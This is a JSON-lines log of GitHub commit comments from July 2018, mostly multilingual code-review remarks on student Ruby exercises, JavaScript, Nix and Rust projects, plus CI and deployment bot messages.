{"id":"8024787938","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849154,"position":49,"line":49,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:38:01Z","updated_at":"2018-07-26T19:38:01Z","author_association":"NONE","body":"\"селф\" не нужен"}},"created_at":"2018-07-26T19:38:01Z"}
{"id":"8024789297","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29849158,"position":86,"line":95,"path":"otus/app/ux-component/participants-manager/create/participant-create-controller.js","commit_id":"7a65581ae9a0130173106b2f43c9580abf56ba23","created_at":"2018-07-26T19:38:18Z","updated_at":"2018-07-26T19:38:18Z","author_association":"MEMBER","body":"Existem outras formas mais interessantes de realizar este tipo de validação, levando em consideração que a busca pelo _id_ do elemento quem sabe irá trazer problemas no futuro.\r\n\r\nÉ possível encontrar uma referência sobre uma possível substituição da validação [aqui](https://material.angularjs.org/latest/demo/input).\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-26T19:38:18Z"}
{"id":"8024790412","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849160,"position":56,"line":56,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:38:33Z","updated_at":"2018-07-26T19:38:33Z","author_association":"NONE","body":"\"селф\" не нужен"}},"created_at":"2018-07-26T19:38:33Z"}
{"id":"8024792142","type":"CommitCommentEvent","actor":{"login":"timjb"},"repo":{"name":"stumoss/.dotfiles"},"payload":{"comment":{"id":29849164,"position":10,"line":54,"path":"nixpkgs/.config/nixpkgs/overlays/vscode.nix","commit_id":"542e1e706ac271ff30850c44ecbdcccc99b07756","created_at":"2018-07-26T19:38:54Z","updated_at":"2018-07-26T19:38:54Z","author_association":"NONE","body":"@stumoss How do you get these sha256 hashes? I tried using\r\n\r\n```bash\r\nnix-prefetch-url --unpack https://vscodevim.gallery.vsassets.io/_apis/public/gallery/publisher/vscodevim/extension/vim/0.11.2/assetbyname/Microsoft.VisualStudio.Services.VSIXPackage\r\n```\r\n\r\nbut unfortunately, this doesn't work for me (since `nix-prefetch-url` apparently doesn't use the MIME type and therefore thinks the downloaded file is a .tar.gz instead of a .zip)."}},"created_at":"2018-07-26T19:38:54Z"}
{"id":"8024792572","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"Slicer/SlicerJupyter"},"payload":{"comment":{"id":29849165,"position":null,"line":null,"path":null,"commit_id":"d54771c0aa81fb10cc6d079dc23c3e86764e5032","created_at":"2018-07-26T19:39:00Z","updated_at":"2018-07-26T19:39:00Z","author_association":"CONTRIBUTOR","body":"I don't think a window can be pushed to the background and it would not help anyway if the notebook is maximized.\r\n\r\n> printing a notice in the notebook\r\n\r\nWhere would you print this notice? Would you add it to regular outputs?\r\n\r\nYou could also add ```slicer.util.mainWindow().showNormal()``` to the beginning of a script if the problem is that you cannot easily identify the corresponding Slicer window. Or display something in the Slicer application's status bar that indicates that it runs a Jupyter kernel instance."}},"created_at":"2018-07-26T19:39:00Z"}
{"id":"8024792843","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29849168,"position":95,"line":57,"path":"src/App.css","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-26T19:39:04Z","updated_at":"2018-07-26T19:39:04Z","author_association":"NONE","body":"use autoprefixer"}},"created_at":"2018-07-26T19:39:04Z"}
{"id":"8024795562","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ifqthenp/otus-spring-hw-02-java-annotations-config"},"payload":{"comment":{"id":29849173,"position":12,"line":12,"path":"src/main/java/com/otus/spring/App.java","commit_id":"6f6fc0e335210eb5d208f236ace1dd2d9b1fb8db","created_at":"2018-07-26T19:39:39Z","updated_at":"2018-07-26T19:39:39Z","author_association":"NONE","body":"Отлично"}},"created_at":"2018-07-26T19:39:39Z"}
{"id":"8024796485","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29849175,"position":57,"line":57,"path":"app/controllers/tweets_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T19:39:51Z","updated_at":"2018-07-26T19:39:51Z","author_association":"NONE","body":"Quando um usuário aperta o botão de destruir um tweet, esta função é invocada. Mas como ela não checa se o usuário é o dono do tweet, ele pode ser apagado de qualquer maneira.\r\nAcho que seria legal impedir que um usuário apague o tweet de outro."}},"created_at":"2018-07-26T19:39:51Z"}
{"id":"8024797265","type":"CommitCommentEvent","actor":{"login":"grahambell"},"repo":{"name":"Starlink/ORAC-DR"},"payload":{"comment":{"id":29849176,"position":null,"line":null,"path":null,"commit_id":"f500bb6bdab8f717f9c609daa8c1e9e27468d514","created_at":"2018-07-26T19:40:00Z","updated_at":"2018-07-26T19:40:00Z","author_association":"CONTRIBUTOR","body":"I suppose users could set it, but as of this commit, oracdr_monitor overwrites it unconditionally.  I added it to solve the problem of ORAC_DATA_OUT being used for GAIA history when running oracdr_monitor.  (And we started using ORAC_DATA_OUT for this recently due to fault 20171124.003.)"}},"created_at":"2018-07-26T19:40:00Z"}
{"id":"8024799929","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29849184,"position":112,"line":127,"path":"otus/app/ux-component/participants-manager/create/participant-create-controller.js","commit_id":"c038231f3f2984e30eb3a990a0e1c2f958c9f2e5","created_at":"2018-07-26T19:40:37Z","updated_at":"2018-07-26T19:40:37Z","author_association":"MEMBER","body":"Existem outras formas mais interessantes de realizar este tipo de validação, levando em consideração que a busca pelo _id_ do elemento quem sabe irá trazer problemas no futuro.\r\n\r\nÉ possível encontrar uma referência sobre uma possível substituição da validação [aqui](https://material.angularjs.org/latest/demo/input)."}},"created_at":"2018-07-26T19:40:37Z"}
{"id":"8024800922","type":"CommitCommentEvent","actor":{"login":"ghiscoding"},"repo":{"name":"ghiscoding/aurelia-slickgrid"},"payload":{"comment":{"id":29849185,"position":9,"line":173,"path":"aurelia-slickgrid/src/aurelia-slickgrid/filters/multipleSelectFilter.ts","commit_id":"696c02a979b74ab506e63905c19a962f6aa6b25a","created_at":"2018-07-26T19:40:47Z","updated_at":"2018-07-26T19:40:47Z","author_association":"OWNER","body":"the argument type might be wrong here, it might not be just a Promise type"}},"created_at":"2018-07-26T19:40:47Z"}
{"id":"8024802973","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849191,"position":33,"line":33,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:41:12Z","updated_at":"2018-07-26T19:41:12Z","author_association":"NONE","body":"не правильно, что у тебя аттрибуты `stations`, `from`, `to` доступны из-вне класса для прямого изменения\r\nсеттеров быть не должно, а для изменения этих аттрибутов по заданию есть специальные методы\r\nдля этих переменных нужно оставить только ридеры"}},"created_at":"2018-07-26T19:41:12Z"}
{"id":"8024806867","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849197,"position":62,"line":62,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:41:54Z","updated_at":"2018-07-26T19:41:54Z","author_association":"NONE","body":"также как в классе Роут акссессоры - неверное решение, нужно оставить только ридеры"}},"created_at":"2018-07-26T19:41:54Z"}
{"id":"8024812938","type":"CommitCommentEvent","actor":{"login":"andimik"},"repo":{"name":"AlbrechtL/welle.io"},"payload":{"comment":{"id":29849207,"position":null,"line":null,"path":null,"commit_id":"ed7c5e7a455f8d23047697fd42762167d1bca1af","created_at":"2018-07-26T19:43:10Z","updated_at":"2018-07-26T19:43:10Z","author_association":"CONTRIBUTOR","body":"cool! Thanks!"}},"created_at":"2018-07-26T19:43:10Z"}
{"id":"8024813446","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849208,"position":33,"line":33,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:43:16Z","updated_at":"2018-07-26T19:43:16Z","author_association":"NONE","body":"если есть желание использовать именно сеттеры, то их нужно сделать приватными, чтобы закрыть переменные от прямого изменения снаружи класса\r\nно в общем-то вполне можно просто обрадаться к инстанс-переменной"}},"created_at":"2018-07-26T19:43:16Z"}
{"id":"8024814078","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849209,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:43:24Z","updated_at":"2018-07-26T19:43:24Z","author_association":"NONE","body":"I thought you said you found a way to resolve that"}},"created_at":"2018-07-26T19:43:24Z"}
{"id":"8024815324","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29849211,"position":null,"line":null,"path":null,"commit_id":"08c1dcc49602364173e1681c6179223a4cdc0160","created_at":"2018-07-26T19:43:40Z","updated_at":"2018-07-26T19:43:40Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/08c1dcc49602364173e1681c6179223a4cdc0160/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T19:43:40Z"}
{"id":"8024816896","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29849216,"position":13,"line":32,"path":"otus/app/module/participant/repository/participant-repository-service.js","commit_id":"96eb1f83c1a2530550f482f7e9e7b85e4648b913","created_at":"2018-07-26T19:44:01Z","updated_at":"2018-07-26T19:44:01Z","author_association":"MEMBER","body":"O conceito de _ é aplicado somente quando estamos tratando de uma função ou variável adicionada junto ao _self_. "}},"created_at":"2018-07-26T19:44:01Z"}
{"id":"8024817747","type":"CommitCommentEvent","actor":{"login":"KamishnikovOlexiy"},"repo":{"name":"KamishnikovOlexiy/1"},"payload":{"comment":{"id":29849217,"position":null,"line":null,"path":null,"commit_id":"c395255ebde17c8f1c88883d2dce6694581b4207","created_at":"2018-07-26T19:44:11Z","updated_at":"2018-07-26T19:44:11Z","author_association":"OWNER","body":"Add tracis-ci badge"}},"created_at":"2018-07-26T19:44:11Z"}
{"id":"8024819463","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29849221,"position":15,"line":34,"path":"otus/app/module/participant/repository/participant-repository-service.js","commit_id":"96eb1f83c1a2530550f482f7e9e7b85e4648b913","created_at":"2018-07-26T19:44:32Z","updated_at":"2018-07-26T19:44:32Z","author_association":"MEMBER","body":"O mesmo comentário acima vale para este caso."}},"created_at":"2018-07-26T19:44:32Z"}
{"id":"8024821586","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849231,"position":75,"line":75,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:44:59Z","updated_at":"2018-07-26T19:44:59Z","author_association":"NONE","body":"в задании сказано:\r\n- \"Может набирать скорость\"\r\n- \"Может тормозить (сбрасывать скорость до нуля)\"\r\n\r\nпервая задача не реализована совсем\r\nвторая реализована в виде стопкрана, т.е. скорость сразу сбрасывается до нуля\r\n(в задании возможно не очень ясная формулировка, но она означает, что поезд может тормозить и это не обязательно должно быть полное торможение, фраза же \"сбрасывать скорость до нуля\" означает, \"обратите внимание! скорость не должна быть меньше нуля\" :) )"}},"created_at":"2018-07-26T19:44:59Z"}
{"id":"8024821589","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29849232,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-26T19:44:59Z","updated_at":"2018-07-26T19:44:59Z","author_association":"COLLABORATOR","body":"@smiths Is 52c0ff2 better?"}},"created_at":"2018-07-26T19:44:59Z"}
{"id":"8024822986","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29849236,"position":18,"line":48,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T19:45:16Z","updated_at":"2018-07-26T19:45:16Z","author_association":"OWNER","body":"AppCode удобнее будет? "}},"created_at":"2018-07-26T19:45:16Z"}
{"id":"8024823948","type":"CommitCommentEvent","actor":{"login":"wpears"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":29849239,"position":null,"line":null,"path":null,"commit_id":"551335eedf62261299af7aafdfc896b3aef8de67","created_at":"2018-07-26T19:45:28Z","updated_at":"2018-07-26T19:45:28Z","author_association":"NONE","body":"I think that line of reasoning certainly applies to `Object.prototype.hasOwnProperty.call(foo, key)`, but `{}.hasOwnProperty.call(foo, key)` still walks the prototype chain, just in a way that can't be polluted by a `hasOwnProperty` key on `foo`.\r\n\r\nPersonally, I think `foo.hasOwnProperty` is a clear enough idiom and overloading `hasOwnProperty` is bad enough practice that it isn't really worth the syntactical indirection. However, I can appreciate the opposite point of view."}},"created_at":"2018-07-26T19:45:28Z"}
{"id":"8024828979","type":"CommitCommentEvent","actor":{"login":"DarienRaymond"},"repo":{"name":"v2ray/v2ray-core"},"payload":{"comment":{"id":29849247,"position":null,"line":null,"path":null,"commit_id":"a941ef5392d47d00dee64e9fa51535fdefd53276","created_at":"2018-07-26T19:46:34Z","updated_at":"2018-07-26T19:46:34Z","author_association":"CONTRIBUTOR","body":"Fixed."}},"created_at":"2018-07-26T19:46:34Z"}
{"id":"8024830058","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849249,"position":75,"line":75,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:46:48Z","updated_at":"2018-07-26T19:46:48Z","author_association":"NONE","body":"лучше, чтобы методы принимали значение\r\nвот примерно так:\r\n```ruby\r\ndef increase_speed(value)\r\n  ......\r\nend\r\n```"}},"created_at":"2018-07-26T19:46:48Z"}
{"id":"8024830317","type":"CommitCommentEvent","actor":{"login":"zdk123"},"repo":{"name":"zdk123/prokka"},"payload":{"comment":{"id":29849250,"position":null,"line":null,"path":null,"commit_id":"66dec8c521b66862780b4605a0624cf9df4874b2","created_at":"2018-07-26T19:46:52Z","updated_at":"2018-07-26T19:46:52Z","author_association":"OWNER","body":"`-e 0` based on newer version of protocol. Added in error."}},"created_at":"2018-07-26T19:46:52Z"}
{"id":"8024831942","type":"CommitCommentEvent","actor":{"login":"v-brians"},"repo":{"name":"CEmail2bug/Mail2Bug"},"payload":{"comment":{"id":29849255,"position":null,"line":null,"path":null,"commit_id":"f8bb8f84e85311a6f6a609895c66851f81f8f538","created_at":"2018-07-26T19:47:14Z","updated_at":"2018-07-26T19:47:14Z","author_association":"COLLABORATOR","body":"Broken."}},"created_at":"2018-07-26T19:47:14Z"}
{"id":"8024833478","type":"CommitCommentEvent","actor":{"login":"dade80vr"},"repo":{"name":"super-nathan/Python_DHT_Library"},"payload":{"comment":{"id":29849259,"position":null,"line":null,"path":null,"commit_id":"41ae52515814dce4930b4435d0d063840c3d9893","created_at":"2018-07-26T19:47:33Z","updated_at":"2018-07-26T19:47:33Z","author_association":"NONE","body":"Nice, works for me with 15mt cables.\r\nHope Adafruit will merge this or other similar mods.\r\n"}},"created_at":"2018-07-26T19:47:33Z"}
{"id":"8024837262","type":"CommitCommentEvent","actor":{"login":"fabsongames"},"repo":{"name":"tinogomes/AssaultCube-Maps"},"payload":{"comment":{"id":29849267,"position":null,"line":null,"path":null,"commit_id":"9285d973bd8ac7e987bafc1f23ab159409a8287e","created_at":"2018-07-26T19:48:21Z","updated_at":"2018-07-26T19:48:21Z","author_association":"NONE","body":"Tinogomes,aqui é o Fabricio,eu dei uma modada naqueles dois mapas Favela,que renomeei para Battlefieldcube,aquele que é uma simulação de um combate urbano estilo cqb,mas está com cara de estados unidos,não é aquele mapa de favela mesmo não,por engano baixei esse e modifiequei ele,para um modo estilo guerra total,com muitos players.O segundo foi uma melhorada no mapa Call of Duty,agora a pessoal do CLA tem com se defender,pois os muros do forte deles estão melhores.\r\nbaixe na minha página\r\ngithub.com/fabsongames\r\nestá em\"downloadmods\"Call e Battlefieldcube"}},"created_at":"2018-07-26T19:48:21Z"}
{"id":"8024838903","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849275,"position":125,"line":125,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:48:43Z","updated_at":"2018-07-26T19:48:43Z","author_association":"NONE","body":"в задании: \"Возвращать предыдущую станцию, текущую, следующую, на основе маршрута\"\r\nлучше сделать отдельные методы для для возврата (не для вывода в консоль!) текущей / предыдущей / следующей станции"}},"created_at":"2018-07-26T19:48:43Z"}
{"id":"8024845442","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849286,"position":null,"line":null,"path":null,"commit_id":"a5766974dc4deaafc6319196b649cbd36db4013b","created_at":"2018-07-26T19:50:01Z","updated_at":"2018-07-26T19:50:01Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-26T19:50:01Z"}
{"id":"8024852392","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849293,"position":12,"line":504,"path":"src/librustc_target/abi/call/mod.rs","commit_id":"16999338b28c31af34956017831c98ca93d2f507","created_at":"2018-07-26T19:51:25Z","updated_at":"2018-07-26T19:51:25Z","author_association":"NONE","body":"I think it would better to use LLVM naming convention here and use riscv32 as eventually we'll also support riscv64."}},"created_at":"2018-07-26T19:51:25Z"}
{"id":"8024852912","type":"CommitCommentEvent","actor":{"login":"schnek"},"repo":{"name":"AscEmu/AscEmu"},"payload":{"comment":{"id":29849295,"position":12,"line":116,"path":"src/world/Server/Master.cpp","commit_id":"283338b30111cf580c2e9f60a81a94444daac7f1","created_at":"2018-07-26T19:51:31Z","updated_at":"2018-07-26T19:51:31Z","author_association":"CONTRIBUTOR","body":"std::experimental::filesystem::v1"}},"created_at":"2018-07-26T19:51:31Z"}
{"id":"8024853767","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849297,"position":107,"line":107,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:51:41Z","updated_at":"2018-07-26T19:51:41Z","author_association":"NONE","body":"вот в этой строке идет обращение к переменной `@station`, но я не нашел, чтобы она где-то инициализировалась до этой строки"}},"created_at":"2018-07-26T19:51:41Z"}
{"id":"8024857759","type":"CommitCommentEvent","actor":{"login":"knowuh"},"repo":{"name":"concord-consortium/building-models"},"payload":{"comment":{"id":29849302,"position":5,"line":10,"path":"test/migrations-test.coffee","commit_id":"9cd41fe3302eb20749d65c60ad2c51772ec8c501","created_at":"2018-07-26T19:52:26Z","updated_at":"2018-07-26T19:52:26Z","author_association":"MEMBER","body":"Oops.\r\n\r\nThis `.only` was never removed, so no other tests have been running since this commit.  \r\n\r\n🙀 "}},"created_at":"2018-07-26T19:52:26Z"}
{"id":"8024858976","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29849304,"position":null,"line":null,"path":null,"commit_id":"561dbabf884147e91064590513bcb6cb3f49dbee","created_at":"2018-07-26T19:52:41Z","updated_at":"2018-07-26T19:52:41Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/561dbabf884147e91064590513bcb6cb3f49dbee/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T19:52:41Z"}
{"id":"8024864916","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Omnia-Contentus"},"payload":{"comment":{"id":29849313,"position":null,"line":null,"path":null,"commit_id":"48b43f74d3cc446e3a1c0a80202261090c2743eb","created_at":"2018-07-26T19:53:50Z","updated_at":"2018-07-26T19:53:50Z","author_association":"NONE","body":"Czar? not happening lmao"}},"created_at":"2018-07-26T19:53:50Z"}
{"id":"8024866277","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29849318,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T19:54:08Z","updated_at":"2018-07-26T19:54:08Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - Win64-Windows-7-VisualStudio-14: Tests Failed (2358 of 2924 tests passed, 57 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 498 tests had: ESO small diffs.\n * 562 tests had: Table big diffs.\n * 360 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 88 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 28 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 19 tests had: ZSZ small diffs.\n * 3 tests had: Table small diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 57\n * Failed: 566\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.64%25-red.png)</a> \n"}},"created_at":"2018-07-26T19:54:08Z"}
{"id":"8024869063","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29849326,"position":null,"line":null,"path":null,"commit_id":"ad23c9ef2357081c0c764016638776e60bb210ad","created_at":"2018-07-26T19:54:40Z","updated_at":"2018-07-26T19:54:40Z","author_association":"NONE","body":"shh it's ok, I'm sorry <3"}},"created_at":"2018-07-26T19:54:40Z"}
{"id":"8024871713","type":"CommitCommentEvent","actor":{"login":"swelljoe"},"repo":{"name":"webmin/usermin"},"payload":{"comment":{"id":29849330,"position":null,"line":null,"path":null,"commit_id":"a31632b637bf7c8dd6f4d36413d51d064779e62a","created_at":"2018-07-26T19:55:13Z","updated_at":"2018-07-26T19:55:13Z","author_association":"COLLABORATOR","body":"This doesn't clarify. This further confuses things. I know I said to get rid of mentions of Qmail, but the formats need to be specified clearly.\r\n\r\nSendmail format should be labeled mbox (as there are several other mail file formats that are either extensions of mbox or wholly incompatible)\r\n\r\nQMail should be labeled Maildir (as there are probably other mail directory formats)\r\n\r\nSo, it was bad and confusing before (who knows what \"Qmail or MH\" is anymore? But this is still confusing.\r\n\r\nAnd, Qmail+LDAP is specific to Qmail, I think? So that one probably needs to keep its label, but I'll double check to see if that specific option applies to anything other than Qmail."}},"created_at":"2018-07-26T19:55:13Z"}
{"id":"8024872795","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849332,"position":113,"line":113,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:55:26Z","updated_at":"2018-07-26T19:55:26Z","author_association":"NONE","body":"ТЗ: \"Может перемещаться между станциями, указанными в маршруте. Перемещение возможно вперед и назад, но только на 1 станцию за раз.\"\r\nобрати внимание: \"на 1 станцию\", \"вперед и назад\"\r\nт.е. по сути нужны 2 метода - \"вперед\", \"назад\" (названия на твой выбор), которые будут двигать на 1 станцию по маршруту относительно текущей станции"}},"created_at":"2018-07-26T19:55:26Z"}
{"id":"8024873878","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29849333,"position":null,"line":null,"path":null,"commit_id":"e606bd76f9882a1d50b6a5142e71be311293e0b9","created_at":"2018-07-26T19:55:39Z","updated_at":"2018-07-26T19:55:39Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-417](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-417).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-417-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T19:55:39Z"}
{"id":"8024874083","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29849334,"position":null,"line":null,"path":null,"commit_id":"feec99df46b78eab203165933e00a1e970840ae8","created_at":"2018-07-26T19:55:42Z","updated_at":"2018-07-26T19:55:42Z","author_association":"NONE","body":"lemme do some OCD magic once you consider it \"done\""}},"created_at":"2018-07-26T19:55:42Z"}
{"id":"8024877039","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849341,"position":99,"line":99,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:56:16Z","updated_at":"2018-07-26T19:56:16Z","author_association":"NONE","body":"хорошо, что станция узнает, что поезд на нее прибыл\r\nно еще было бы неплохо, если бы поезд тоже как-то \"помнил\" где он находится"}},"created_at":"2018-07-26T19:56:16Z"}
{"id":"8024878504","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29849343,"position":null,"line":null,"path":null,"commit_id":"143a08d34a37437a9c3ca0c6a61e1f2e58b0f481","created_at":"2018-07-26T19:56:32Z","updated_at":"2018-07-26T19:56:32Z","author_association":"NONE","body":"\"ording\"\r\nsmh"}},"created_at":"2018-07-26T19:56:32Z"}
{"id":"8024880166","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849347,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:56:52Z","updated_at":"2018-07-26T19:56:52Z","author_association":"COLLABORATOR","body":"well, i said non supporting aspectj resolves the tests\n\nOn Thu, Jul 26, 2018 at 10:43 PM Wyclif Luyima <notifications@github.com>\nwrote:\n\n> I thought you said you found a way to resolve that\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/e4317249e73da99bf34c4a78b8de9d71c96a6b88#commitcomment-29849209>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8tYZqK19DQc-B6D6p-hu3PU9pzPAks5uKhvcgaJpZM4ViVWD>\n> .\n>\n\n\n-- \n\n*Kaweesi Joseph*\n\n*Jembi Health Systems NPC* *|  **Uganda*\n\n*Mobile: **+256784994313** | Office: **Software Developer** | Skype:*\n*kaweesi.joseph*\n*E-mail: kaweesi@jembi.org <kaweesi@jembi.org>*\n\n\n\n*This e-mail contains proprietary and confidential information some or all\nof which may be legally privileged. It is for the intended recipient only.\nIf an addressing or transmission error has misdirected this e-mail, please\nnotify the author by replying to this e-mail and then deleting same. If you\nare not the intended recipient you must not use, disclose, distribute,\ncopy, print or rely on this e-mail. Jembi Health Systems NPO, its\nsubsidiaries and associated companies is not liable for the security of\ninformation sent by e-mail and accepts no liability of whatsoever nature\nfor any loss, damage or expense resulting, directly or indirectly, from the\naccess of this e-mail or any attachments hereto.*\n"}},"created_at":"2018-07-26T19:56:52Z"}
